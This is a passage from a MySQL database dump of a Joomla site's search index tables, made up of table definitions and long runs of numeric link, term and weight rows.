37331),(4849,1647227,1.16669),(4849,1647228,1.30669),(4849,1647229,0.51331),(4849,1647230,1.00331),(4849,1647231,1.07331),(4849,1647232,0.28),(4940,1647232,0.28),(4849,1647233,0.88669),(4849,1647234,1.09669),(4849,1647235,1.00331),(4909,1647235,1.00331),(4849,1647236,1.16669),(4849,1647237,0.32669),(4849,1647238,0.98),(4849,1647239,1.23669),(4849,1647240,1.07331),(4849,1647241,1.37669),(4849,1647242,0.51331),(4849,1647243,1.07331),(4849,1647244,1.14331),(4849,1647245,0.51331),(4849,1647246,1.19),(4849,1647247,1.35331),(4849,1647248,0.51331),(4849,1647249,1.21331),(4849,1647250,1.4),(4849,1647251,0.23331),(4849,1647252,1.07331),(4849,1647253,1.4),(4849,1647254,0.46669),(4849,1647255,0.98),(4849,1647256,1.23669),(4849,1647257,0.32669),(4909,1647257,0.65338),(4849,1647258,1.02669),(4849,1647259,1.19),(4849,1647260,0.56),(4849,1647261,1.09669),(4849,1647262,1.28331),(4849,1647263,1.12),(4849,1647264,1.19),(4849,1647265,0.46669),(4849,1647266,1.16669),(4849,1647267,1.26),(4849,1647268,1.00331),(4849,1647269,1.21331),(4849,1647270,0.46669),(4849,1647271,1.07331),(4849,1647272,1.35331),(4849,1647273,0.51331),(4849,1647274,1.05),(4849,1647275,1.14331),(4849,1647276,0.23331),(4849,1647277,0.93331),(4849,1647278,0.98),(4850,1647946,2.8666),(4851,1648002,0.90661),(4851,1648003,2.66339),(4851,1648004,2.49339),(4851,1648005,3.00339),(4851,1648006,0.90661),(4852,1648006,0.90661),(4851,1648007,0.88669),(4851,1648008,1.00331),(4852,1648055,0.79339),(4852,1648056,2.55),(4852,1648057,3.06),(4852,1648058,0.79339),(4852,1648059,2.60661),(4857,1648327,0.93331),(4857,1648328,1.05),(4857,1648329,3.52008),(4857,1648330,1.28331),(4909,1672210,2.8666),(4909,1672217,2.1332),(4909,1672218,6.1332),(4909,1672219,6.5332),(4909,1672358,0.74662),(4909,1672359,0.98),(4909,1672360,1.16669),(4909,1672361,1.00331),(4909,1672362,1.12),(4909,1672363,0.95669),(4909,1672364,1.07331),(4909,1672365,1.19),(4909,1672366,1.12),(4909,1672367,1.19),(4909,1672368,1.19),(4909,1672369,1.23669),(4909,1672370,0.37331),(4909,1672371,0.93331),(4909,1672372,1.07331),(4909,1672373,0.46669),(4909,1672374,1.05),(4909,1672375,1.09669),(4909,1672376,0.28),(4909,1672377,0.93331),(4909,1672378,1.02669),(4909,1672379,0.74662),(4909,1672380,0.95669),(4909,1672381,1.05),(4909,1672382,1.07331),(4909,1672383,1.23669),(4909,1672384,0.28),(4909,1672385,0.95669),(4909,1672386,1.14331),(4909,1672387,0.37331),(4909,1672388,1.05),(4909,1672389,1.35331),(4909,1672390,0.32669),(4909,1672391,1.00331),(4909,1672392,1.21331),(4909,1672393,1.00331),(4909,1672394,1.05),(4909,1672395,1.12),(4909,1672396,1.16669),(4909,1672397,0.42),(4909,1672398,0.95669),(4909,1672399,1.02669),(4909,1672400,0.65338),(4909,1672401,2.00662),(4909,1672402,2.14662),(4917,1678865,2.8666),(4917,1679195,0.60669),(4917,1679196,1.19),(4917,1679197,1.28331),(4917,1679198,1.09669),(4917,1679199,1.19),(4917,1679200,0.32669),(4917,1679201,1.05),(4917,1679202,1.21331),(4917,1679203,0.84),(4917,1679204,0.91),(4917,1679205,1.07331),(4917,1679206,0.91),(4917,1679207,1.21331),(4917,1679208,1.07331),(4917,1679209,1.16669),(4917,1679210,0.56),(4917,1679211,0.93331),(4917,1679212,1.23669),(4917,1679213,0.91),(4917,1679214,1.05),(4917,1679215,1.24661),(4917,1679216,3.06),(4917,1679217,0.28),(4917,1679218,0.91),(4917,1679219,1.05),(4917,1679220,0.46669),(4917,1679221,1.19),(4917,1679222,1.35331),(4917,1679223,0.28),(4917,1679224,0.98),(4917,1679225,1.05),(4917,1679226,0.23331),(4938,1679226,0.23331),(4940,1679226,0.46662),(4917,1679227,0.88669),(4917,1679228,1.09669),(4917,1679229,1.05),(4917,1679230,1.12),(4917,1679231,0.74662),(4917,1679232,0.93331),(4917,1679233,1.00331),(4917,1679234,0.98),(4917,1679235,1.14331),(4917,1679236,0.37331),(4917,1679237,1.07331),(4917,1679238,1.28331),(4917,1679239,0.88669),(4917,1679240,1.14331),(4917,1679241,1.02669),(4917,1679242,1.21331),(4917,1679243,0.42),(4917,1679244,0.98),(4917,1679245,1.07331),(4917,1679246,0.56),(4917,1679247,1.05),(4917,1679248,1.30669),(4918,1679874,2.8666),(4924,1680544,5.0668),(4924,1680545,5.8668),(4924,1680546,2.8666),(4927,1682726,2.8666),(4927,1682728,0.56),(4927,1682729,0.91),(4927,1682730,1.07331),(4927,1682731,0.95669),(4927,1682732,1.00331),(4927,1682736,1.05),(4927,1682737,1.09669),(4927,1682738,0.79331),(4927,1682739,0.95669),(4927,1683080,0.56),(4927,1683081,1.02669),(4927,1683082,1.21331),(4927,1683083,0.37331),(4927,1683084,0.98),(4927,1683085,1.07331),(4927,1683086,0.42),(4927,1683087,0.98),(4927,1683088,1.16669),(4927,1683089,0.60669),(4927,1683090,1.07331),(4927,1683091,1.4),(4927,1683092,0.51331),(4927,1683093,1.16669),(4927,1683094,1.37669),(4927,1683095,1.14331),(4927,1683096,1.21331),(4927,1683097,0.28),(4927,1683098,0.93331),(4927,1683099,1.12),(4927,1683100,0.37331),(4927,1683101,1.09669),(4927,1683102,1.16669),(4927,1683103,0.42),(4927,1683104,0.98),(4927,1683105,1.21331),(4927,1683106,0.42),(4927,1683107,1.14331),(4927,1683108,1.23669),(4927,1683109,0.46669),(4927,1683110,1.07331),(4927,1683111,1.26),(4927,1683112,0.28),(4927,1683113,1.00331),(4927,1683114,1.16669),(4927,1683115,0.28),(4927,1683116,1.00331),(4927,1683117,1.07331),(4927,1683118,0.42),(4927,1683119,1.16669),(4927,1683120,1.21331),(4927,1683121,0.18669),(4927,1683122,1.05),(4927,1683123,1.33),(4927,1683124,1.19),(4927,1683125,3.06),(4927,1683126,1.09669),(4927,1683127,1.33),(4927,1683128,1.16669),(4927,1683129,1.37669),(4927,1683130,0.93338),(4927,1683131,1.00331),(4927,1683132,1.35331),(4927,1683133,1.07331),(4927,1683134,1.23669),(4927,1683135,0.51331),(4927,1683136,1.02669),(4927,1683137,1.28331),(4927,1683138,1.07331),(4927,1683139,1.14331),(4927,1683140,1.07331),(4927,1683141,1.35331),(4928,1683722,2.8666),(4928,1683735,0.90661),(4928,1683736,2.43661),(4928,1683737,2.72),(4928,1683738,0.56661),(4928,1683739,2.49339),(4928,1683740,2.77661),(4929,1683761,2.8666),(4930,1683794,2.55),(4931,1683820,2.60661),(4934,1683959,3.4668),(4934,1683960,6.9332),(4934,1683961,2.8666),(4934,1683994,1.00331),(4934,1683995,1.19),(4935,1684025,2.8666),(4938,1686126,2.8666),(4938,1686408,0.37331),(4940,1686408,0.37331),(4938,1686409,1.09669),(4940,1686409,1.09669),(4938,1686410,1.33),(4940,1686410,1.33),(4938,1686411,0.91),(4940,1686411,0.91),(4938,1686412,0.95669),(4940,1686412,0.95669),(4938,1686413,0.88669),(4938,1686414,0.93331),(4938,1686415,1.05),(4938,1686416,1.23669),(4938,1686417,0.56),(4938,1686418,1.09669),(4938,1686419,1.26),(4938,1686420,0.42),(4938,1686421,1.26),(4938,1686422,1.4),(4938,1686423,0.60669),(4938,1686424,1.07331),(4938,1686425,1.19),(4938,1686426,0.37331),(4938,1686427,0.95669),(4938,1686428,1.09669),(4938,1686429,0.88669),(4940,1686429,1.77338),(4938,1686430,1.09669),(4940,1686430,2.19338),(4940,1686431,0.81669),(4938,1686431,1.63338),(4940,1686432,1.00331),(4938,1686432,2.00662),(4938,1686433,0.42),(4938,1686434,1.16669),(4938,1686435,1.4),(4938,1686436,0.56),(4938,1686437,1.05),(4938,1686438,1.30669),(4938,1686439,1.00331),(4938,1686440,1.12),(4938,1686441,0.32669),(4938,1686442,1.09669),(4938,1686443,1.35331),(4938,1686444,0.32669),(4938,1686445,1.09669),(4938,1686446,1.35331),(4938,1686447,1.02),(4938,1686448,2.72),(4938,1686449,3.00339),(4938,1686450,0.46669),(4938,1686451,1.00331),(4938,1686452,1.33),(4938,1686453,0.93338),(4938,1686454,0.98),(4938,1686455,1.12),(4938,1686456,1.12),(4938,1686457,1.33),(4938,1686458,1.35331),(4938,1686459,1.35331),(4938,1686460,1.14331),(4938,1686461,1.12),(4938,1686462,1.19),(4938,1686463,1.30669),(4940,1688177,5.6),(4940,1688178,6.9332),(4940,1688179,0.28),(4940,1688180,0.98),(4940,1688181,1.09669),(4940,1688182,2.8666),(4940,1688208,1.82),(4940,1688209,2.05338),(4940,1688517,0.51331),(4940,1688518,1.12),(4940,1688519,1.26),(4940,1688520,0.32669),(4940,1688521,0.91),(4940,1688522,1.05),(4940,1688523,0.88669),(4940,1688524,1.00331),(4940,1688525,0.37331),(4940,1688526,1.33),(4940,1688527,1.4),(4940,1688528,1.02669),(4940,1688529,1.28331),(4940,1688530,0.37331),(4940,1688531,1.16669),(4940,1688532,1.37669),(4940,1688533,0.37331),(4940,1688534,1.12),(4940,1688535,1.23669),(4940,1688536,0.32669),(4940,1688537,1.14331),(4940,1688538,1.21331),(4940,1688539,0.46669),(4940,1688540,1.19),(4940,1688541,1.4),(4940,1688542,1.14331),(4940,1688543,1.4),(4940,1688544,1.21331),(4940,1688545,1.35331),(4940,1688546,2.28),(4940,1688547,2.60661),(4940,1688548,3.23),(4940,1688549,1.07331),(4940,1688550,1.19),(4940,1688551,2.38),(4940,1688552,1.4),(4940,1688553,1.4),(4940,1688554,1.30669),(4940,1688555,0.42),(4940,1688556,1.12),(4940,1688557,1.23669),(4940,1688558,0.42),(4940,1688559,0.98),(4940,1688560,1.12),(4940,1688561,0.84),(4940,1688562,0.98),(4940,1688563,1.16669),(4940,1688564,1.02669),(4940,1688565,1.26),(4940,1688566,1.05),(4940,1688567,1.19),(4940,1688568,1.05),(4940,1688569,1.33),(4940,1688570,1.00331),(4940,1688571,1.28331),(4940,1688572,1.02669),(4940,1688573,1.26),(4940,1688574,1.05),(4940,1688575,1.16669),(4945,1689241,2.8666),(4945,1689242,2.9332),(4945,1689243,6.4),(4945,1689253,2.77661),(4945,1689254,3.4),(4947,1689297,0.79339),(4947,1689298,2.66339),(4947,1689299,3.00339),(4948,1689334,2.38),(4948,1689335,2.60661),(4948,1689336,0.79339),(4948,1689337,2.32339),(4948,1689338,2.72),(4951,1689381,2.8666),(4953,1689409,0.8),(4953,1689410,5.4668),(4953,1689411,1.0668),(4953,1689412,5.0668),(4953,1689413,6.1332),(4953,1689414,2.8666),(4954,1689440,5.4668),(4954,1689451,0.45339),(4954,1689452,2.09661),(4954,1689453,2.60661),(4956,1689507,2.8666);
/*!40000 ALTER TABLE `fw3gt_finder_links_terms7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_terms8`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_terms8`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_terms8` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_terms8`
--

LOCK TABLES `fw3gt_finder_links_terms8` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_terms8` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_terms8` VALUES (4909,1523578,0.07),(4626,1523578,0.14),(4732,1523578,0.14),(4762,1523578,0.21),(4658,1523578,0.28),(4723,1523589,1.3334),(4764,1523589,1.3334),(4837,1523589,2.6668),(4850,1523589,2.6668),(4928,1523589,2.6668),(4951,1523589,2.6668),(4723,1523590,3.2666),(4764,1523590,3.2666),(4837,1523590,6.5332),(4850,1523590,6.5332),(4928,1523590,6.5332),(4951,1523590,6.5332),(4723,1523591,4),(4764,1523591,4),(4837,1523591,8),(4850,1523591,8),(4928,1523591,8),(4951,1523591,8),(4538,1523592,0.6666),(4539,1523592,0.6666),(4540,1523592,0.6666),(4541,1523592,0.6666),(4543,1523592,0.6666),(4552,1523592,0.6666),(4569,1523592,0.6666),(4571,1523592,0.6666),(4572,1523592,0.6666),(4574,1523592,0.6666),(4580,1523592,0.6666),(4581,1523592,0.6666),(4585,1523592,0.6666),(4591,1523592,0.6666),(4592,1523592,0.6666),(4593,1523592,0.6666),(4594,1523592,0.6666),(4595,1523592,0.6666),(4604,1523592,0.6666),(4608,1523592,0.6666),(4614,1523592,0.6666),(4616,1523592,0.6666),(4617,1523592,0.6666),(4624,1523592,0.6666),(4625,1523592,0.6666),(4626,1523592,0.6666),(4635,1523592,0.6666),(4653,1523592,0.6666),(4658,1523592,0.6666),(4661,1523592,0.6666),(4664,1523592,0.6666),(4672,1523592,0.6666),(4673,1523592,0.6666),(4678,1523592,0.6666),(4687,1523592,0.6666),(4693,1523592,0.6666),(4710,1523592,0.6666),(4721,1523592,0.6666),(4723,1523592,0.6666),(4727,1523592,0.6666),(4732,1523592,0.6666),(4734,1523592,0.6666),(4735,1523592,0.6666),(4736,1523592,0.6666),(4749,1523592,0.6666),(4753,1523592,0.6666),(4755,1523592,0.6666),(4759,1523592,0.6666),(4761,1523592,0.6666),(4762,1523592,0.6666),(4764,1523592,0.6666),(4766,1523592,0.6666),(4767,1523592,0.6666),(4770,1523592,0.6666),(4771,1523592,0.6666),(4773,1523592,0.6666),(4776,1523592,0.6666),(4777,1523592,0.6666),(4778,1523592,0.6666),(4780,1523592,0.6666),(4798,1523592,0.6666),(4799,1523592,0.6666),(4803,1523592,0.6666),(4804,1523592,0.6666),(4806,1523592,0.6666),(4808,1523592,0.6666),(4809,1523592,0.6666),(4813,1523592,0.6666),(4814,1523592,0.6666),(4669,1523592,0.89991),(4741,1523592,1.13322),(4541,1523845,1.6),(4669,1523856,0.56),(4741,1523856,1.12),(4543,1523856,1.6),(4569,1524768,0.5334),(4948,1524768,1.0668),(4569,1524769,2.8666),(4569,1524770,3.4666),(4569,1524771,1.0666),(4574,1524771,1.0666),(4569,1524772,1.3334),(4569,1524773,3),(4569,1524774,3.6),(4571,1524961,0.9334),(4572,1525016,0.9334),(4574,1525102,0.4),(4710,1525102,0.4),(4938,1525102,0.8),(4574,1525103,0.8),(4574,1525104,2.8666),(4574,1525105,3.1334),(4574,1525106,2.7334),(4574,1525107,3.2),(4669,1527327,0.18669),(4741,1527327,0.37338),(4591,1527327,0.5334),(4591,1527328,2.4666),(4591,1527329,2.8666),(4593,1527344,0.6666),(4593,1527345,2.6666),(4593,1527346,3.1334),(4593,1527347,1.3334),(4593,1527348,2.9334),(4593,1527349,3.3334),(4593,1527350,1.4666),(4593,1527351,2.9334),(4593,1527352,3.4),(4593,1527353,0.6666),(4593,1527354,3.0666),(4593,1527355,3.3334),(4593,1527364,0.9334),(4593,1527365,2.8666),(4593,1527366,3.6),(4594,1527486,0.14),(4624,1527486,0.14),(4594,1527487,0.81669),(4594,1527488,0.98),(4594,1527494,1.0666),(4594,1527495,2.7334),(4594,1527496,3.1334),(4594,1527497,1.4666),(4594,1527498,3.0666),(4594,1527499,3.6666),(4594,1527500,0.5334),(4594,1527501,2.8666),(4594,1527502,3.0666),(4594,1527553,0.18662),(4594,1527554,0.86331),(4594,1527555,0.95669),(4594,1527556,0.88669),(4594,1527557,0.95669),(4595,1527726,1.6),(4595,1527727,3.6666),(4604,1535968,0.56),(4624,1535968,0.56),(4604,1535969,1.05),(4604,1535970,1.19),(4604,1535971,0.46669),(4626,1535971,0.46669),(4604,1535972,1.02669),(4626,1535972,1.02669),(4604,1535973,1.30669),(4604,1535974,1.4666),(4604,1535975,3.3334),(4604,1535989,1.02662),(4604,1535990,1.19),(4604,1535991,1.4),(4604,1535992,1.05),(4604,1535993,1.30669),(4604,1535994,1.0666),(4616,1535994,1.0666),(4617,1535994,1.0666),(4798,1535994,1.0666),(4604,1536180,0.42),(4604,1536181,1.23669),(4604,1536182,1.4),(4604,1536183,0.93338),(4604,1536184,2.14662),(4604,1536185,1.26),(4604,1536186,1.28331),(4608,1540095,0.5334),(4616,1540095,0.5334),(4624,1540095,0.5334),(4625,1540095,0.5334),(4608,1540096,2.8),(4624,1540096,2.8),(4625,1540096,2.8),(4608,1540097,3.5334),(4608,1540100,0.9334),(4608,1540101,2.8),(4608,1540102,3.3334),(4608,1540240,0.04669),(4614,1540240,0.04669),(4608,1540241,0.81669),(4608,1540242,0.88669),(4614,1546225,0.21),(4614,1546226,0.84),(4614,1546227,0.98),(4614,1546228,0.21),(4614,1546229,0.86331),(4614,1546230,0.93331),(4614,1546231,1.0666),(4614,1546232,3.2),(4614,1546508,0.95669),(4614,1546509,1.12),(4614,1546510,0.56),(4614,1546511,1.28331),(4614,1546512,1.4),(4616,1547721,3),(4616,1547722,3.9334),(4616,1547731,0.51331),(4616,1547732,1.23669),(4616,1547733,1.4),(4616,1547736,0.42),(4616,1547737,1.09669),(4616,1547738,1.4),(4616,1547739,2.8666),(4616,1547740,3.6),(4616,1547741,0.37331),(4616,1547742,1.19),(4616,1547743,1.4),(4617,1548215,0.04669),(4803,1548215,0.1334),(4617,1548216,0.88669),(4617,1548217,1.28331),(4617,1548218,1.0666),(4617,1548219,3.4),(4617,1548220,4),(4617,1548308,0.46669),(4617,1548309,1.23669),(4617,1548310,1.4),(4624,1553889,0.79331),(4624,1553890,1.02669),(4624,1553911,0.46669),(4624,1553912,1.21331),(4624,1553913,1.37669),(4624,1553914,0.56),(4624,1553915,0.65331),(4624,1553916,1.09669),(4624,1553917,1.26),(4624,1553924,0.37331),(4624,1553925,1.16669),(4624,1553926,1.4),(4624,1553927,0.60669),(4624,1553928,1.09669),(4624,1553929,1.35331),(4624,1553939,1.21331),(4624,1553940,1.4),(4624,1553952,0.51331),(4624,1553953,1.05),(4624,1553954,1.4),(4624,1553955,0.7),(4624,1553956,1.21331),(4624,1553957,1.4),(4624,1553958,0.14),(4624,1553959,1.05),(4624,1553960,1.12),(4624,1554160,0.09331),(4624,1554161,1.02669),(4624,1554162,1.19),(4624,1554482,0.46669),(4624,1554483,1.09669),(4624,1554484,1.37669),(4625,1554876,3.2666),(4625,1554878,1.2),(4625,1554879,2.9334),(4625,1554880,3.4666),(4625,1554881,0.8),(4625,1555054,0.60669),(4625,1555055,1.05),(4625,1555056,1.23669),(4625,1555057,0.65331),(4625,1555058,1.21331),(4625,1555059,1.37669),(4626,1555973,0.81669),(4626,1555974,0.98),(4626,1555975,0.81669),(4626,1555976,1.16669),(4626,1555977,0.56),(4626,1555978,0.95669),(4626,1555979,1.14331),(4626,1556012,1.30669),(4626,1556013,0.32669),(4626,1556014,0.95669),(4626,1556015,1.09669),(4626,1556016,0.51331),(4626,1556017,1.21331),(4626,1556018,1.4),(4626,1556312,0.37331),(4626,1556313,0.95669),(4626,1556314,1.21331),(4626,1556315,0.28),(4626,1556316,0.91),(4626,1556317,1.14331),(4626,1556906,0.60669),(4626,1556907,1.05),(4626,1556908,1.30669),(4635,1558493,1.7334),(4635,1558494,3.7334),(4635,1558495,3.8666),(4635,1558499,1.6),(4635,1558500,3.7334),(4635,1558501,4),(4669,1559003,1.09669),(4741,1559003,2.19338),(4669,1559012,0.09331),(4741,1559012,0.18662),(4669,1559013,0.81669),(4741,1559013,1.63338),(4669,1559014,0.95669),(4741,1559014,1.91338),(4669,1559015,0.91),(4741,1559015,1.82),(4669,1559016,1.02669),(4741,1559016,2.05338),(4669,1559022,0.14),(4741,1559022,0.28),(4669,1559023,0.88669),(4741,1559023,1.77338),(4669,1559024,1.19),(4741,1559024,2.38),(4669,1559025,1.0666),(4741,1559025,1.0666),(4749,1559025,1.0666),(4799,1559025,1.0666),(4806,1559025,1.0666),(4813,1559025,1.0666),(4814,1559025,1.0666),(4930,1559025,1.0666),(4931,1559025,1.0666),(4851,1559025,3.1998),(4857,1559025,3.1998),(4653,1560561,0.8),(4653,1560562,2.7334),(4653,1560563,1.2),(4653,1560564,3.1334),(4653,1560565,3.7334),(4653,1560569,1.6),(4653,1560570,3.0666),(4653,1560571,3.6),(4653,1560572,0.9334),(4653,1560573,3.1334),(4653,1560574,3.4666),(4653,1560587,0.6666),(4653,1560588,2.8),(4653,1560589,3),(4653,1560590,0.8),(4653,1560591,2.7334),(4653,1560592,3.4),(4653,1560593,2.8),(4653,1560594,3.3334),(4653,1560595,1.6),(4653,1560596,3.5334),(4653,1560597,4),(4658,1562919,0.95669),(4658,1562920,1.12),(4658,1562921,1.91338),(4658,1562922,2.1),(4658,1562923,0.93331),(4658,1562924,1.00331),(4661,1563466,1.2),(4661,1563467,3),(4940,1563616,0.18662),(4664,1563616,0.2666),(4732,1563616,0.2666),(4917,1563616,0.5332),(4664,1563617,2.8666),(4732,1563617,2.8666),(4664,1563618,3.4),(4732,1563618,3.4),(4664,1563626,0.2666),(4732,1563626,0.2666),(4664,1563627,2.7334),(4664,1563628,2.9334),(4669,1564739,1.4),(4669,1564740,1.30669),(4669,1564742,2.8666),(4669,1564743,0.60669),(4673,1564859,1.6),(4673,1564860,3.2),(4673,1564861,4),(4678,1565343,1.3334),(4678,1565344,3.2),(4678,1565345,3.3334),(4678,1565346,1.2),(4678,1565347,2.8),(4678,1565348,3),(4678,1565349,1.7334),(4678,1565350,3.3334),(4678,1565351,4),(4687,1568590,1.0666),(4687,1568591,3.2),(4687,1568592,3.8666),(4710,1592170,2.9334),(4710,1592171,3.5334),(4710,1592340,0.18669),(4710,1592341,0.93331),(4710,1592342,1.12),(4721,1602908,0.9334),(4721,1602909,3.2666),(4721,1602910,4),(4721,1602911,1.4666),(4721,1602912,3.5334),(4721,1602913,4),(4721,1602914,1.3334),(4721,1602915,3.1334),(4727,1605063,1.0666),(4727,1605064,3.1334),(4727,1605065,3.8),(4727,1605066,0.9334),(4727,1605067,3.0666),(4727,1605068,3.6666),(4732,1613343,0.93331),(4732,1613344,1.07331),(4732,1613345,0.91),(4732,1613346,1.07331),(4732,1613355,1.0666),(4761,1613355,1.0666),(4762,1613355,1.0666),(4732,1613356,2.7334),(4732,1613357,3.4666),(4732,1613358,1.3334),(4732,1613359,2.8),(4732,1613360,3.4),(4732,1613363,2.7334),(4734,1615866,1.0666),(4734,1615867,2.7334),(4734,1615868,3.4666),(4734,1615869,1.3334),(4734,1615870,3.6666),(4734,1615871,1.3334),(4734,1615872,3.5334),(4734,1615873,3.6666),(4734,1615874,1.4666),(4734,1615875,3),(4734,1615876,3.4666),(4734,1616423,0.46669),(4734,1616424,1.07331),(4734,1616425,1.12),(4735,1617910,0.2666),(4809,1617910,0.2666),(4735,1617911,2.5334),(4735,1617912,2.8666),(4736,1618026,1.8666),(4736,1618027,1.3334),(4736,1618028,3),(4736,1618029,3.1334),(4741,1621212,1.4),(4741,1621213,1.4),(4741,1621214,1.35331),(4741,1621215,1.4),(4741,1621216,1.4),(4741,1621219,3),(4749,1621219,3),(4813,1621219,3),(4741,1621220,0.7),(4741,1621221,0.7),(4741,1621222,1.35331),(4741,1621223,1.4),(4753,1623631,0.6666),(4753,1623632,2.5334),(4753,1623633,2.8666),(4759,1623815,0.4),(4759,1623816,2.3334),(4759,1623817,2.8),(4761,1626258,0.35),(4761,1626259,0.86331),(4761,1626260,0.91),(4761,1626261,0.35),(4761,1626262,0.86331),(4761,1626263,0.91),(4761,1626264,0.35),(4761,1626265,0.86331),(4761,1626266,0.91),(4761,1626267,0.21),(4761,1626268,0.81669),(4761,1626269,1.05),(4761,1626270,0.35),(4761,1626271,0.86331),(4761,1626272,0.91),(4761,1626289,3.2666),(4761,1626290,3.8),(4761,1626600,0.32669),(4761,1626601,1.07331),(4761,1626602,1.30669),(4761,1626603,0.46669),(4761,1626604,1.16669),(4761,1626605,1.4),(4761,1626606,0.42),(4761,1626607,1.12),(4761,1626608,1.26),(4761,1626609,0.84),(4761,1626610,2.1),(4761,1626611,2.61338),(4761,1626612,0.56),(4761,1626613,1.19),(4761,1626614,1.4),(4762,1628048,0.95669),(4762,1628049,1.09669),(4762,1628050,0.98),(4762,1628051,1.14331),(4762,1628052,0.93331),(4762,1628053,1.16669),(4762,1628054,0.35),(4762,1628055,1.05),(4762,1628056,1.21331),(4762,1628069,3.4666),(4762,1628070,4),(4762,1628071,0.37331),(4762,1628072,1.07331),(4762,1628073,1.21331),(4762,1628255,0.23331),(4762,1628256,1.00331),(4762,1628257,1.05),(4764,1629030,1.3334),(4764,1629031,3.3334),(4764,1629032,3.8666),(4766,1629120,0.8),(4955,1629120,0.8),(4771,1629235,0.9334),(4771,1629236,1.3334),(4771,1629237,3.2),(4777,1629358,0.9334),(4777,1629359,2.8),(4777,1629360,3),(4780,1629945,1.2),(4780,1629946,2.8666),(4780,1629947,3),(4798,1643158,2.8),(4798,1643159,3),(4798,1643160,2),(4798,1643161,3.6),(4798,1643162,3.8666),(4798,1643804,0.28),(4798,1643805,0.95669),(4798,1643806,1.09669),(4798,1643807,0.51331),(4798,1643808,1.02669),(4798,1643809,1.12),(4798,1643810,0.32669),(4798,1643811,1.00331),(4798,1643812,1.28331),(4799,1644126,0.8),(4814,1644126,0.8),(4799,1644127,3),(4814,1644127,3),(4799,1644128,3.3334),(4814,1644128,3.3334),(4799,1644129,2.8666),(4814,1644129,2.8666),(4799,1644130,3.2),(4814,1644130,3.2),(4803,1644919,2.5334),(4803,1644920,2.9334),(4803,1644921,1.7334),(4927,1644921,3.4668),(4803,1644922,3.2),(4927,1644922,6.4),(4803,1644923,3.3334),(4804,1645162,0.6666),(4804,1645163,2.4666),(4804,1645164,2.8666),(4804,1645165,0.5334),(4804,1645167,1.0666),(4804,1645168,3.0666),(4804,1645169,3.4666),(4806,1645267,1.4666),(4806,1645268,3.2),(4806,1645269,3.8),(4806,1645270,3),(4806,1645271,3.5334),(4808,1645356,1.6),(4808,1645357,3.2666),(4808,1645358,4),(4809,1645381,2.6666),(4809,1645382,3.0666),(4809,1645383,0.6666),(4809,1645384,2.5334),(4809,1645385,3.0666),(4813,1645510,0.5334),(4813,1645513,3.6),(4813,1645514,1.0666),(4813,1645515,2.9334),(4813,1645516,3.1334),(4814,1645579,1.0666),(4814,1645580,3),(4814,1645581,3.2),(4814,1645584,0.9334),(4814,1645585,3.2666),(4814,1645586,3.8666),(4814,1645587,0.8),(4814,1645588,2.6),(4814,1645589,3.2),(4814,1645602,1.24661),(4814,1645603,2.72),(4814,1645604,2.89),(4839,1646578,1.0668),(4847,1646578,1.0668),(4839,1646579,0.6666),(4847,1646579,0.6666),(4852,1646579,0.6666),(4839,1646580,2.6666),(4839,1646581,3.0666),(4847,1646854,5.7332),(4847,1646855,6.8),(4847,1646856,2.6666),(4847,1646857,3),(4849,1646928,0.28),(4849,1646929,0.88669),(4849,1646930,0.95669),(4849,1646931,0.28),(4849,1646932,0.88669),(4849,1646933,0.95669),(4849,1646935,2.4),(4849,1646936,6),(4849,1646937,6.4),(4849,1647082,0.42),(4849,1647083,1.07331),(4849,1647084,1.23669),(4851,1647977,2.4),(4851,1647978,6.4),(4851,1647979,2.8666),(4851,1647980,3.3334),(4851,1647981,6),(4851,1647982,7.3332),(4851,1647983,2.1332),(4852,1647983,2.1332),(4852,1648038,2.6666),(4852,1648039,3.4),(4852,1648040,2.1332),(4852,1648041,6.2668),(4852,1648042,7.4668),(4852,1648043,2.1332),(4852,1648044,6.2668),(4857,1648300,2.8666),(4857,1648301,3.4666),(4857,1648302,6),(4909,1672188,0.86331),(4909,1672189,1.07331),(4909,1672196,0.5332),(4909,1672197,5.6),(4909,1672198,6.4),(4909,1672199,2.4),(4909,1672200,6),(4909,1672201,7.6),(4909,1672271,0.46662),(4909,1672272,1.77338),(4909,1672273,1.14331),(4909,1672274,1.12),(4917,1678863,5.2),(4917,1678864,6.8),(4917,1678866,2.9332),(4917,1678867,7.3332),(4918,1679868,1.0668),(4918,1679869,1.0668),(4918,1679870,5.2),(4924,1680570,0.68),(4924,1680571,2.49339),(4924,1680572,2.66339),(4927,1682713,1.0668),(4927,1682720,0.42),(4927,1682721,1.00331),(4927,1682722,1.16669),(4927,1682727,7.2),(4927,1682906,0.28),(4927,1682907,0.88669),(4927,1682908,1.00331),(4927,1682909,0.7),(4927,1682910,1.16669),(4927,1682911,1.33),(4927,1682912,0.51331),(4927,1682913,1.16669),(4927,1682914,1.26),(4928,1683724,1.6),(4928,1683725,6.4),(4928,1683726,7.0668),(4928,1683727,2.9332),(4928,1683728,6.1332),(4928,1683729,6.8),(4929,1683770,1.58661),(4929,1683771,2.60661),(4929,1683772,2.72),(4930,1683783,1.3332),(4930,1683784,6),(4930,1683785,2.8666),(4930,1683786,3.4666),(4931,1683814,2.8666),(4931,1683815,3.4666),(4931,1683816,2.6668),(4931,1683817,6.4),(4934,1683956,1.0668),(4957,1683956,1.0668),(4934,1683957,6.4),(4934,1683958,7.6),(4938,1686122,5.8668),(4938,1686123,7.0668),(4938,1686130,2.6668),(4938,1686131,6.5332),(4938,1686132,7.2),(4940,1688154,0.91),(4940,1688155,1.05),(4940,1688156,0.91),(4940,1688157,1.05),(4940,1688158,0.28),(4940,1688159,1.00331),(4940,1688160,1.07331),(4940,1688161,0.93331),(4940,1688162,1.00331),(4940,1688163,0.56),(4940,1688164,1.91338),(4940,1688165,1.21331),(4940,1688166,1.12),(4940,1688169,1.0668),(4940,1688188,0.46662),(4940,1688189,1.86662),(4940,1688190,2.05338),(